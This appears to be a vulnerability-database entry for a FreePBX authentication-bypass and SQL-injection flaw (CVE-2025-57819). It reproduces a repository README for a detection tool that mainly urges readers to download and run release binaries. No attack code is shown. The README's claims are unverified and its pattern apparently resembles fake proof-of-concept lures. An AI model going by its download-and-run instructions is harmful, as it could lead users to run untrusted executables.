Associated Vulnerability
Title: FreePBX Affected by Authentication Bypass Leading to SQL Injection and RCE (CVE-2025-57819)
Description: FreePBX is an open-source web-based graphical user interface. FreePBX 15, 16, and 17 endpoints are vulnerable due to insufficiently sanitized user-supplied data allowing unauthenticated access to FreePBX Administrator leading to arbitrary database manipulation and remote code execution. This issue has been patched in endpoint versions 15.0.66, 16.0.89, and 17.0.3.
Description
Detect SQL injection risks in FreePBX's admin interface safely and efficiently, providing actionable insights and clean JSON reports for security teams.
Readme
# CVE-2025-57819_FreePBX-PoC - Simple SQL Injection Checker for Your Needs
## Download Now
[Download the latest release](https://github.com/JakovBis/CVE-2025-57819_FreePBX-PoC/releases)
## Getting Started
Welcome to the **CVE-2025-57819_FreePBX-PoC** project. This application allows you to safely check for SQL Injection vulnerabilities in FreePBX. It uses simple techniques to provide accurate results without harming your system.
### Features
- **Read-Only Operation:** No changes are made to the target FreePBX system.
- **Multi-Method Detection:** Utilizes error, boolean, and time-based techniques.
- **Detailed Reporting:** JSON format for easy understanding.
- **Per-Parameter Verdicts:** Check each parameter individually for vulnerabilities.
- **User-Friendly Interface:** Designed for those with no programming background.
## System Requirements
To run this application, you need:
- A computer with Windows, macOS, or Linux.
- At least 1 GB of RAM.
- A stable internet connection.
## Download & Install
To get started, follow these steps:
1. **Visit the Release Page:** Go to the [Releases page](https://github.com/JakovBis/CVE-2025-57819_FreePBX-PoC/releases) on GitHub.
2. **Select Latest Version:** Look for the latest version available.
3. **Download the Application:**
   - Click the download link for your operating system. The application is often provided in formats like `.exe` for Windows, `.dmg` for macOS, and `.tgz` or `.zip` for Linux.
4. **Run the Application:** After downloading, open the file and follow the on-screen instructions to launch the checker.
## How to Use the Application
1. **Start the Checker:** Open the application you downloaded.
2. **Enter Your Target:** Input the FreePBX URL or IP address you want to check.
3. **Choose Options:** Select from the available detection methods based on your need.
4. **Run the Check:** Press the start button to begin the check.
5. **View Results:** After completion, review the JSON report to understand the findings.
## Understanding the Report
The output is presented in a JSON format, which is structured for clarity. Each parameter checked will have its own section that details whether it is vulnerable or not.
Example section in the JSON report:
```json
{
  "parameter": "username",
  "vulnerable": false,
  "details": "No injectable parameters found."
}
```
This format makes it easy for anyone to read and interpret the results.
## Troubleshooting Common Issues
- **Error Starting Application:** Ensure you have the necessary permissions to run the file.
- **Invalid URL Error:** Double-check the FreePBX address you entered. It should be reachable.
- **No Results Shown:** Review your network connection and confirm that the target FreePBX is running.
## Get More Help
If you encounter challenges or have questions, check the project's GitHub for additional information or ask in the issues section. The community can provide support and share tips.
## Feedback
Your feedback helps improve this project. If you find bugs or have suggestions, please report them on the GitHub issues page.
## Explore More
Discover related topics and tools in the security space:
- **Asterisk:** A powerful open-source framework for building communications applications.
- **SQL Injection Protection:** Learn about methods to prevent SQL Injection.
- **Penetration Testing:** Gain insights into testing for vulnerabilities in systems.
For more information, visit the [Releases page](https://github.com/JakovBis/CVE-2025-57819_FreePBX-PoC/releases) to stay updated on the latest features and updates.
File Snapshot
[4.0K] /data/pocs/1db26aef66bbfd57819aa97273255847c9a94a54
├── [ 15K] freepbx_sqli_checker.py
├── [1.0K] LICENSE
├── [3.6K] README.md
├── [2.5K] SECURITY.md
├── [4.0K] unlatticed
└── [1.3M] CVE-2025-57819_FreePBX-PoC.zip
1 directory, 5 files